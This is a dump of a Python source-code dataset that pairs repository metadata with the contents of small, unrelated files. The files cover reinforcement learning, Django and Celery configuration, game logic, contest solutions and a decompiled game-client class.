blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
516373953da84479aba9b11e0bae3dbf7d26ccf5
|
bb41814dc79f56a082a777e17ed31320db43edf4
|
/reinforcement_learning/0x00-q_learning/4-play.py
|
d6b4d54e98814a6ad8799721a6031a8177cbde91
|
[] |
no_license
|
garimasinghgryffindor/holbertonschool-machine_learning
|
a92c619b6ad2d110ed97b33fa9903f5134c96866
|
856ee36006c2ff656877d592c2ddb7c941d63780
|
refs/heads/master
| 2023-08-01T09:58:13.863062 | 2020-11-28T00:50:55 | 2020-11-28T00:50:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 674 |
py
|
#!/usr/bin/env python3
"""
Has the trained agent play an episode
"""
import numpy as np
def play(env, Q, max_steps=100):
"""
Has the trained agent play an episode
:param env: is the FrozenLakeEnv instance
:param Q: is a numpy.ndarray containing the Q-table
:param max_steps: is the maximum number of steps in the episode
:return: the total rewards for the episode
"""
state = env.reset()
env.render()
for step in range(max_steps):
action = np.argmax(Q[state])
new_state, reward, done, info = env.step(action)
env.render()
if done:
return reward
state = new_state
env.close()
|
[
"[email protected]"
] | |
e79fb1916d742af9ebab6860a5bdb652ce86a1d1
|
ede6ee7bdbd76dbb39ffcddfc98725062566ebf4
|
/barbados/indexes/list.py
|
6c9b98ec709fd610d48643a70555b79387304c46
|
[] |
no_license
|
cohoe/barbados
|
cfa3cb4fab8c183fc4a4f943f452a89ebe193ea2
|
343f8fd4ac1f18e5e93d519cbc064693280e4d00
|
refs/heads/master
| 2021-08-07T12:33:53.263230 | 2021-07-18T01:59:16 | 2021-07-18T01:59:16 | 234,824,108 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 541 |
py
|
from elasticsearch_dsl import Document, Text, InnerDoc, Object
from barbados.indexes.base import BaseIndex, BarbadosIndex
class ListItemIndex(InnerDoc):
cocktail_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
spec_slug = Text(analyzer='whitespace', search_analyzer='whitespace')
class ListIndex(Document, BarbadosIndex):
id = Text(analyzer='whitespace', search_analyzer='whitespace')
display_name = Text()
items = Object(ListItemIndex, multi=True)
class Index(BaseIndex):
name = 'list'
|
[
"[email protected]"
] | |
e1bb0795b99caf9bd0e6effbaf3c0a068848378b
|
12b7dc1d608b0deca429485493482afca5f99736
|
/app/config/settings/dev.py
|
8f40045b1ceefb621445b8de6efa70ce96e82c8e
|
[] |
no_license
|
Ryanden/EB-Docker-Deploy2-practice-
|
3c147786ccb6567c8e325ac79527052a15152a4a
|
4e12f4e35da6d26979b6915165227f9167c507d5
|
refs/heads/master
| 2022-12-09T09:37:51.404751 | 2019-05-16T05:04:15 | 2019-05-16T05:04:15 | 142,002,119 | 0 | 0 | null | 2022-12-08T02:36:17 | 2018-07-23T10:58:30 |
Python
|
UTF-8
|
Python
| false | false | 369 |
py
|
from .base import *
secrets = json.load(open(os.path.join(SECRETS_DIR, 'dev.json')))
DEBUG = True
INSTALLED_APPS += [
'storages',
'django_extensions'
]
DEFAULT_FILE_STORAGE = 'config.storages.S3DefaultStorage'
AWS_STORAGE_BUCKET_NAME = secrets['AWS_STORAGE_BUCKET_NAME']
WSGI_APPLICATION = 'config.wsgi.dev.application'
DATABASES = secrets['DATABASES']
|
[
"[email protected]"
] | |
d20bfefcbb689e95a0e699712752808cee0aabd1
|
5966449d2e29c9b64351895db2932f94f9de42da
|
/catkin_ws/build/calibration_common/catkin_generated/pkg.develspace.context.pc.py
|
74b3622b6da1649f18d3cf518a907cdaf2f04265
|
[] |
no_license
|
godaeseong/GoHriProject
|
8cbce6934485b8ba3253fc7b6c5b5b59397b4518
|
425e70b7c91b6215f5477fc2250d2b0ac96577be
|
refs/heads/master
| 2021-05-11T22:11:56.099580 | 2018-01-15T02:20:43 | 2018-01-15T02:20:43 | 117,484,817 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 613 |
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3".split(';') if "/home/hri/catkin_ws/src/calibration_toolkit/calibration_common/include;/usr/include/eigen3" != "" else []
PROJECT_CATKIN_DEPENDS = "cmake_modules;image_geometry".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "calibration_common"
PROJECT_SPACE_DIR = "/home/hri/catkin_ws/devel/.private/calibration_common"
PROJECT_VERSION = "1.0.0"
|
[
"[email protected]"
] | |
6c191364901cf72b6e7ec942af7f4fc7c333ad1a
|
fc353b0433348ff58841cf32bf1f5e594e037513
|
/leetcode/830.py
|
8c5023a11d45ce74865a0054c858b8aaa012615c
|
[] |
no_license
|
TrellixVulnTeam/Demo_933I
|
ce759ec52dd191f99b998862f4aba7971878ba37
|
ab662060eb07a88a48c9832e09bf268517c1a3fa
|
refs/heads/master
| 2023-04-27T16:55:29.627491 | 2021-05-07T05:38:58 | 2021-05-07T05:38:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 230 |
py
|
from graphics import *
import math
spriaal = GraphWin("Joonistus", 1000, 1000)
a = 5
b = 4
while True:
x = math.sin(a + math.pi() / 2)
y = math.sin()
pt = Point(x + 500, y + 500)
pt.draw(spriaal)
|
[
"[email protected]"
] | |
0474c7ac7fcab24e97fcd8a5d1fc67dd45461b2f
|
3a476e0de377d1580facbfd78efdfbca009ed7a3
|
/uct_test.py
|
403c551b8a4100fa685aca7eda34a6d39cf067a1
|
[
"MIT"
] |
permissive
|
liuruoze/Thought-SC2
|
b7366186dbb4494fabdb3e0104354665e21ff707
|
b3cfbeffbfa09b952c596805d2006af24613db2d
|
refs/heads/master
| 2023-04-28T11:47:56.771797 | 2021-01-15T00:25:26 | 2021-01-15T00:25:26 | 296,185,180 | 4 | 2 |
MIT
| 2023-04-24T09:06:48 | 2020-09-17T01:17:04 |
Python
|
UTF-8
|
Python
| false | false | 1,300 |
py
|
USED_DEVICES = "6,7"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
from uct.numpy_impl import *
import tensorflow as tf
from prototype.dynamic_network import DynamicNetwork
from prototype.hier_network import HierNetwork
def test(is_restore_policy=True, is_restore_dynamic=True):
# train model
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
hier_net = HierNetwork(sess, policy_path='./model/20181217-154646/probe')
hier_net.initialize()
if is_restore_policy:
hier_net.restore_policy()
policy_net = PolicyNetinMCTS(hier_net)
dynamic_model_path = './model/20181223-174748_dynamic/probe'
if is_restore_dynamic:
hier_net.restore_dynamic(dynamic_model_path)
dynamic_net = hier_net.dynamic_net
num_reads = 100
import time
tick = time.time()
print(UCT_search(GameState(dynamic_net), num_reads, policy_net))
tock = time.time()
print("Took %s sec to run %s times" % (tock - tick, num_reads))
#import resource
#print("Consumed %sB memory" % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
if __name__ == "__main__":
test()
|
[
"[email protected]"
] | |
e10a899ea0e195ad55ab677dbc9616a9e3f64832
|
f72fa4432e6abb742cbf1c61c580db1ed688a311
|
/day27/s21crm/crm/forms/school.py
|
c8e42b166247fd56e11cee8ef0a4b0e7def14cb2
|
[] |
no_license
|
huningfei/python
|
7ddc9da14a3e53ad1c98fc48edd1697a6f8fc4f7
|
9ca1f57f2ef5d77e3bb52d70ac9a241b8cde54d2
|
refs/heads/master
| 2022-10-31T18:56:33.894302 | 2019-01-04T11:06:59 | 2019-01-04T11:06:59 | 128,178,516 | 2 | 1 | null | 2022-10-12T19:26:04 | 2018-04-05T08:25:32 |
Python
|
UTF-8
|
Python
| false | false | 401 |
py
|
from django import forms
from crm import models
class SchoolModelForm(forms.ModelForm):
class Meta:
model = models.School # 这里前面的model一定不要写models
fields = '__all__'
error_messages = {
'title': {'required': '学校不能为空'}
}
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control'})
}
|
[
"[email protected]"
] | |
909457621a61debda7558bb9f60c2c7feb57b2d0
|
76a402b7db1432f9bf8b9605416521a4284ce1e2
|
/nim_game.py
|
95d3be8cab232b6f99b6eef35ff32fa60baa5ddf
|
[] |
no_license
|
SuguruChhaya/nim-game
|
7aa915a475d414288fbb33957cad88ec4dac0c1d
|
6f345a36dc3a26ee8e5f89c139718a21b7050232
|
refs/heads/master
| 2022-12-13T01:30:04.352715 | 2020-09-22T23:42:51 | 2020-09-22T23:42:51 | 285,307,692 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,498 |
py
|
import random
'''
Not to create objects but just to manage the methods.
'''
class MainGame():
def __init__(self, reaching_number, increment, goesfirst):
self.reaching_number = reaching_number
self.increment = increment
self.goesfirst = goesfirst
#*Keeps track of the previous numbers
self.total = 0
self.current_choice = 0
#*Finding the reaching_number - 1 number
self.ending_win_number = self.reaching_number - 1
self.follow_increment = self.increment + 1
#*Rather than making the move based on the past move, I should try to get it close to the win_number_list
self.win_number_list = []
for i in range(self.ending_win_number, 0, -1 * self.follow_increment):
self.win_number_list.append(i)
self.win_number_list = sorted(self.win_number_list)
def gotoplayerturn(self):
if self.goesfirst == '0':
self.no_input_character()
elif self.goesfirst == '1':
self.input_character()
def no_input_character(self):
#*This function os for the characters without inputs (computer, you advice)
print("\nThe computer's turn")
print(f"\nCurrent total: {self.total}")
if self.total not in self.win_number_list:
for i in self.win_number_list:
if i > self.total and i - self.total <= self.increment:
self.current_choice = i - self.total
print(f"The computer chooses: {self.current_choice}\n")
self.total += self.current_choice
#*Just in case the player knows the strategy and there is no hope to win,
#*I will pick a random int
elif self.total in self.win_number_list:
self.current_choice = random.randint(1, self.increment)
print(f"The computer chooses: {self.current_choice}\n")
self.total += self.current_choice
if self.total >= self.reaching_number:
print(f"The computer reached {self.reaching_number}.")
print("The computer loses.")
else:
self.input_character()
def input_character(self):
#*This function is for the characters with inputs (you, your friend)
not_valid = True
while not_valid:
print('\nYour turn:')
print(f"\nCurrent total: {self.total}")
print(f"Pick the increment (max:{self.increment})")
self.current_choice = input("You choose: ")
try:
self.current_choice = int(self.current_choice)
if not 1 <= self.current_choice <= self.increment:
raise(ValueError)
else:
self.total += self.current_choice
not_valid = False
if self.total >= self.reaching_number:
print(f"You reached {self.reaching_number}.")
print("You lose.")
else:
self.no_input_character()
except ValueError:
print("Enter valid command or integer.")
not_valid = True
print("\nWelcome to the nim game! \nYou will count from 1 to the reaching number. \nYou will choose the max increment and the reaching number.\nSince the computer will perform the best possible moves to win, you can use this program to beat your friends!")
not_valid = True
while not_valid:
try:
print("\nThe reaching number has to be between 20 and 100 (inclusive).")
reaching_number_str = input("Enter reaching number: ")
print("\nThe max increment has to be between 3 and 10 (inclusive).")
incement_str = input("Enter max increment: ")
reaching_number = int(reaching_number_str)
increment = int(incement_str)
not_valid = False
if (not 20 <= reaching_number <= 100) or (not 3 <= increment <= 10):
raise(ValueError)
else:
zero_player = "The computer"
one_player = "You"
goesfirst = input(f"Who goes first: 0({zero_player}) or 1({one_player})>")
if goesfirst in ['0', '1']:
game = MainGame(reaching_number, increment, goesfirst)
game.gotoplayerturn()
else:
raise (ValueError)
except ValueError:
print("Enter a valid command or integer.")
not_valid = True
|
[
"[email protected]"
] | |
6759479a9640fc8ea7ba928109da4abbb456fb4a
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/25/usersdata/112/12124/submittedfiles/av1_3.py
|
0b936ae903da1273501fd3e5f09c85bf73708585
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 219 |
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import math
zeta=0
tan=0
a=input('Digite o valor de a')
b=input('Digite o valor de b')
c=a%b
while a%b!=0:
if b%c!=0:
b=zeta
zeta=a
print(zeta)
|
[
"[email protected]"
] | |
36eef88f9be11b834b7c966f8e0e37c3e0e6c41b
|
8388d0ed8ad412c47d47dd9da8f05e35f7e2644c
|
/accepted/48-rotate-image.py
|
7a18dd7fa4f48ec671c91742020ac5e4795f1851
|
[] |
no_license
|
luodichen/leetcode-solution
|
d4cd5abbb0f5cf640035b563ed566c706d4fcbed
|
74c2f9e0e60e64c84be6db9b0511db037d12b109
|
refs/heads/master
| 2020-05-16T16:45:42.056541 | 2015-11-16T05:41:59 | 2015-11-16T05:41:59 | 39,545,259 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 606 |
py
|
# https://leetcode.com/problems/rotate-image/
class Solution:
# @param {integer[][]} matrix
# @return {void} Do not return anything, modify matrix in-place instead.
def rotate(self, matrix):
if 0 == len(matrix):
return list()
result = []
col_len = len(matrix[0])
for i in xrange(col_len):
result_row = []
for row in matrix[::-1]:
result_row.append(row[i])
result.append(result_row)
del matrix[:]
for row in result:
matrix.append(row)
|
[
"[email protected]"
] | |
810e8fc904dfdccceb4282cca5aa2a50ec0181a8
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/eve/client/script/environment/spaceObject/structure.py
|
88fcfaaef3632e06940848939a4cc0691a53f89d
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,417 |
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\structure.py
import blue
import uthread
import structures
import evetypes
import logging
from eve.client.script.environment.spaceObject.buildableStructure import BuildableStructure
from eve.client.script.environment.model.turretSet import TurretSet
from evegraphics.explosions.spaceObjectExplosionManager import SpaceObjectExplosionManager
STATE_CONSTRUCT = 'construct'
STATE_VULNERABLE = 'vulnerable'
STATE_INVULNERABLE = 'invulnerable'
STATE_SIEGED = 'sieged'
STATE_DECONSTRUCT = 'deconstruct'
STATES = {structures.STATE_UNKNOWN: STATE_INVULNERABLE,
structures.STATE_UNANCHORED: STATE_DECONSTRUCT,
structures.STATE_ANCHORING: STATE_CONSTRUCT,
structures.STATE_ONLINE: STATE_INVULNERABLE,
structures.STATE_SHIELD_VULNERABLE: STATE_VULNERABLE,
structures.STATE_SHIELD_REINFORCE: STATE_SIEGED,
structures.STATE_ARMOR_VULNERABLE: STATE_VULNERABLE,
structures.STATE_ARMOR_REINFORCE: STATE_SIEGED,
structures.STATE_HULL_VULNERABLE: STATE_VULNERABLE}
class Structure(BuildableStructure):
__unloadable__ = True
def __init__(self):
BuildableStructure.__init__(self)
self.Init()
def Release(self):
BuildableStructure.Release(self)
self.Init()
def Init(self):
self.fitted = False
self.state = None
self.timer = None
self.turrets = []
self.modules = {}
def Assemble(self):
self.SetStaticRotation()
self.SetupSharedAmbientAudio()
self.OnSlimItemUpdated(self.typeData.get('slimItem'))
def OnSlimItemUpdated(self, item):
if item is None or self.unloaded:
return
if item.state and (item.state != self.state or item.timer != self.timer):
if item.timer and item.state == structures.STATE_ANCHORING:
start, end, paused = item.timer
duration = (end - start) / const.SEC
elapsed = duration - max(end - blue.os.GetWallclockTime(), 0L) / const.SEC
else:
duration = 0
elapsed = 0
self.state = item.state
self.timer = item.timer
self.GotoState(STATES[self.state], duration, elapsed)
if set([ i[0] for i in item.modules or [] if evetypes.GetGraphicID(i[1]) is not None ]) != set(self.modules.keys()):
uthread.new(self.ReloadHardpoints)
def OnDamageState(self, damageState):
BuildableStructure.OnDamageState(self, damageState)
if self.model is not None and damageState is not None:
states = [ (d if d is not None else 0.0) for d in damageState ]
self.model.SetImpactDamageState(states[0], states[1], states[2], False)
def GotoState(self, state, totalTime = 0, elapsedTime = 0):
if state == STATE_CONSTRUCT:
uthread.new(self.BuildStructure, float(totalTime), float(elapsedTime))
elif state == STATE_DECONSTRUCT:
uthread.new(self.TearDownStructure, float(totalTime), float(elapsedTime))
else:
uthread.new(self.LoadModelWithState, state)
def LoadModelWithState(self, newState):
if self.model is None:
self.LoadModel()
self.TriggerAnimation(newState)
self.FitHardpoints()
self.StartStructureLoopAnimation()
def LoadModel(self, fileName = None, loadedModel = None):
self.model = self.GetStructureModel()
self.SetAnimationSequencer(self.model)
self.NotifyModelLoaded()
def ReloadHardpoints(self):
self.UnfitHardpoints()
self.FitHardpoints()
def UnfitHardpoints(self):
if not self.fitted:
return
self.logger.debug('Unfitting hardpoints')
newModules = {}
for key, val in self.modules.iteritems():
if val not in self.turrets:
newModules[key] = val
self.modules = newModules
del self.turrets[:]
self.fitted = False
def FitHardpoints(self, blocking = False):
if self.fitted:
return
if self.model is None:
self.logger.warning('FitHardpoints - No model')
return
self.logger.debug('Fitting hardpoints')
self.fitted = True
newTurretSetDict = TurretSet.FitTurrets(self.id, self.model, self.typeData.get('sofFactionName', None))
self.turrets = []
for key, val in newTurretSetDict.iteritems():
self.modules[key] = val
self.turrets.append(val)
def LookAtMe(self):
if not self.model:
return
if not self.fitted:
self.FitHardpoints()
def StopStructureLoopAnimation(self):
animationUpdater = self.GetStructureModel().animationUpdater
if animationUpdater is not None:
animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 1, 0, 1, True)
def StartStructureLoopAnimation(self):
animationUpdater = self.GetStructureModel().animationUpdater
if animationUpdater is not None:
animationUpdater.PlayLayerAnimation('TrackMaskLayer1', 'Layer1Loop', False, 0, 0, 1, True)
def BuildStructure(self, anchoringTime, elapsedTime):
self.LoadUnLoadedModels()
self.logger.debug('Structure: BuildStructure %s', self.GetTypeID())
self.PreBuildingSteps()
delay = int((anchoringTime - elapsedTime) * 1000)
uthread.new(self._EndStructureBuild, delay)
self.TriggerAnimation(STATE_CONSTRUCT, curveLength=anchoringTime, elapsedTime=elapsedTime)
def _EndStructureBuild(self, delay):
blue.pyos.synchro.SleepSim(delay)
if self.released or self.exploded:
return
self.StartStructureLoopAnimation()
self.PostBuildingSteps(True)
self.LoadModel()
def TearDownStructure(self, unanchoringTime, elapsedTime):
self.LoadUnLoadedModels()
self.logger.debug('Structure: TearDownStructure %s', self.GetTypeID())
self.StopStructureLoopAnimation()
self.PreBuildingSteps()
delay = int((unanchoringTime - elapsedTime) * 1000)
uthread.new(self._EndStructureTearDown, delay)
self.TriggerAnimation(STATE_DECONSTRUCT, curveLength=unanchoringTime, elapsedTime=elapsedTime)
def _EndStructureTearDown(self, delay):
blue.pyos.synchro.SleepSim(delay)
if self.released or self.exploded:
return
self.PostBuildingSteps(False)
self.model = self.GetNanoContainerModel()
def Explode(self, explosionURL = None, scaling = 1.0, managed = False, delay = 0.0):
if SpaceObjectExplosionManager.USE_EXPLOSION_BUCKETS:
self.logger.debug('Exploding with explosion bucket')
scene = sm.GetService('space').GetScene()
wreckSwitchTime, _, __ = SpaceObjectExplosionManager.ExplodeBucketForBall(self, scene)
return wreckSwitchTime
explosionURL, (delay, _) = self.GetExplosionInfo()
explosionLocatorSets = None
if hasattr(self.model, 'locatorSets'):
explosionLocatorSets = self.model.locatorSets.FindByName('explosions')
rotation = self.GetStaticRotation()
self.explosionManager.PlayClientSideExplosionBall(explosionURL, (self.x, self.y, self.z), rotation, explosionLocatorSets)
return delay
|
[
"[email protected]"
] | |
d52e595dc32e6ffdf0abd0ec6fc0f348ce9ada5e
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03089/s662353627.py
|
14c606722f6e0774d8c3d2625e893ec714620f0c
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 365 |
py
|
n = int(input())
b = list(map(int , input().split()))
def f(c):
for i in reversed(range(len(c))):
if c[i] == i+1:
return (c[i], c[:i] + c[i+1:])
return (-1, c)
ans = []
for i in range(n):
(a, b) = f(b)
if a == -1:
print(-1)
exit()
ans.append(a)
#print(ans, b)
print('\n'.join(map(str, reversed(ans))))
|
[
"[email protected]"
] | |
7249037b709c0aa0c8542843b0645547e32df6f8
|
a08492c20c6bda0282170fee569f3cd199876ec7
|
/scr/return_directories.py
|
6e090bc090e123ede17864f4f68be58e20f41193
|
[] |
no_license
|
GregoryREvans/evans
|
a7744011ccd2395e15d325092e85a31379717e6d
|
7b0f7caa55e1c4b2a733b9b6fc42230a43313fb6
|
refs/heads/master
| 2023-08-31T04:29:31.296222 | 2023-08-21T02:32:12 | 2023-08-21T02:32:12 | 143,075,881 | 4 | 1 | null | 2021-06-06T07:27:38 | 2018-07-31T22:22:06 |
Python
|
UTF-8
|
Python
| false | false | 425 |
py
|
import pathlib
def return_directories(
p="/Users/gregoryevans/Scores",
ignores=("_archive", ".mypy_cache", "_squonk", "akasha", "stirrings_still"),
):
build_path = pathlib.Path(p)
returns = []
for score in sorted(build_path.iterdir()):
if not score.is_dir():
continue
if score.name in ignores:
continue
else:
returns.append(score)
returns
|
[
"[email protected]"
] | |
c37631b47a0b6af83326403ee829649b804d3d58
|
f9697acaab8a8ee05ccbd5368f6c72ad8c5dd485
|
/backend/test_23115/wsgi.py
|
d1ce4e85722e439b0c888cf764cf31d84dc3e907
|
[] |
no_license
|
crowdbotics-apps/test-23115
|
f6fd5b199d5586aed78f0a9844062c83ee0ab574
|
c6e7f7cf32130aa45fb31bba3fa67ad8e0346e82
|
refs/heads/master
| 2023-01-24T22:13:58.393735 | 2020-12-01T16:37:00 | 2020-12-01T16:37:00 | 317,603,669 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
"""
WSGI config for test_23115 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'test_23115.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
16e7a75e20aad03573da75c844a7329f52d68fe5
|
32c56293475f49c6dd1b0f1334756b5ad8763da9
|
/google-cloud-sdk/lib/surface/container/node_pools/__init__.py
|
245eda35f54a0e9605d06f2abed352e8ec9f670c
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] |
permissive
|
bopopescu/socialliteapp
|
b9041f17f8724ee86f2ecc6e2e45b8ff6a44b494
|
85bb264e273568b5a0408f733b403c56373e2508
|
refs/heads/master
| 2022-11-20T03:01:47.654498 | 2020-02-01T20:29:43 | 2020-02-01T20:29:43 | 282,403,750 | 0 | 0 |
MIT
| 2020-07-25T08:31:59 | 2020-07-25T08:31:59 | null |
UTF-8
|
Python
| false | false | 1,982 |
py
|
# -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The command group for cloud container operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.container import container_command_util
from googlecloudsdk.command_lib.container import flags
from googlecloudsdk.command_lib.container import messages
from googlecloudsdk.core import log
class NodePools(base.Group):
"""Create and delete operations for Google Kubernetes Engine node pools."""
@staticmethod
def Args(parser):
"""Add arguments to the parser.
Args:
parser: argparse.ArgumentParser, This is a standard argparser parser with
which you can register arguments. See the public argparse documentation
for its capabilities.
"""
flags.AddZoneAndRegionFlags(parser)
def Filter(self, context, args):
"""Modify the context that will be given to this group's commands when run.
Args:
context: {str:object}, A set of key-value pairs that can be used for
common initialization among commands.
args: argparse.Namespace: The same namespace given to the corresponding
.Run() invocation.
Returns:
The refined command context.
"""
context['location_get'] = container_command_util.GetZoneOrRegion
return context
|
[
"[email protected]"
] | |
b2617614628599bfb4b9f00487c546159e392f55
|
e663909cec3c4eda12bb705fce9a6dc901bb7d88
|
/爬虫/day12 celery/案例/定时任务的使用/tasks.py
|
4c40c0aff2ac3b0e98d732cc5040744ae7ff06b3
|
[] |
no_license
|
1284753334/learning2
|
a03f293965a652883503cae420d8b1ad11ae6661
|
f2fcb3c856656cc8427768b41add3ee083487592
|
refs/heads/master
| 2023-01-30T23:18:26.951210 | 2020-12-20T15:57:18 | 2020-12-20T15:57:18 | 315,065,804 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 461 |
py
|
from celery import Celery
from celery import Task
app = Celery('tasks', backend='redis://:[email protected]:6379/2',
broker='redis://:[email protected]:6379/2')
app.config_from_object('celery_config')
@app.task(bind=True)
def period_task(self):
print('period task done: {0}'.format(self.request.id))
# 运行work
# celery -A tasks worker -l info -P eventlet
# 运行定时的模块 .bat 启动任务 任务会自动执行
# celery -A tasks beat
|
[
"[email protected]"
] | |
e50c5b58cede70ff4ee4e99a6462a2a0bfa66ebb
|
1c390cd4fd3605046914767485b49a929198b470
|
/leetcode/number-of-ways-to-reorder-array-to-get-same-bst.py
|
20d18c287b19a6543b31a2e3550bee7c771d1829
|
[] |
no_license
|
wwwwodddd/Zukunft
|
f87fe736b53506f69ab18db674311dd60de04a43
|
03ffffee9a76e99f6e00bba6dbae91abc6994a34
|
refs/heads/master
| 2023-01-24T06:14:35.691292 | 2023-01-21T15:42:32 | 2023-01-21T15:42:32 | 163,685,977 | 7 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 320 |
py
|
class Solution:
def numOfWays(self, a: List[int]) -> int:
z = factorial(len(a))
def F(a):
nonlocal z
if a:
z //= len(a)
F([i for i in a if i < a[0]])
F([i for i in a if i > a[0]])
F(a)
return (z - 1) % 1000000007
|
[
"[email protected]"
] | |
d84008737b9bd1f9dcb63e284d0f2f7a674116bc
|
d880b55d45726a9b9b12d24b059769350eeb6fb6
|
/app/tests/test_eventactions.py
|
0d49b3c282c0d5aaafc4cee1e7dc907315c8b1b1
|
[
"Apache-2.0"
] |
permissive
|
twatchy/cito_engine
|
261a0bbf0dbdf1fe8cca19f598972307bc7df1c7
|
a62dce3c76567dd36b7efcaa70e03728b335f44e
|
refs/heads/master
| 2020-04-21T11:36:25.187256 | 2016-11-01T03:37:13 | 2016-11-01T03:37:13 | 169,531,529 | 0 | 0 |
Apache-2.0
| 2019-02-07T06:57:48 | 2019-02-07T06:57:43 |
Python
|
UTF-8
|
Python
| false | false | 4,329 |
py
|
"""Copyright 2014 Cyrus Dasadia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from time import time
from mock import patch, call
from django.test import TestCase
from cito_engine.models import Incident, IncidentLog, EventActionCounter
from cito_engine.poller.event_poller import EventPoller
from . import factories
class TestEventActions(TestCase):
"""
X = 2, Y=100
Case 1
* One incident in T secs
* 2nd at T+10, 3rd at T+11, 4th at T+51
* Assert we have 1 single incident, 4 logs and event action executed once
* 5th incident occurs at T+101
* Assert counters are reset
* 6th incident occurs at T+151
* Assert event action is executed for the second time
"""
def setUp(self):
self.event = factories.EventFactory.create()
self.eventaction = factories.EventActionFactory.create(event=self.event,threshold_count=2, threshold_timer=100)
@patch('cito_engine.actions.incidents.requests')
def test__single_event_action_execution(self, mock_requests):
T = int(time())
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (self.event.id, T)
eventpoller = EventPoller()
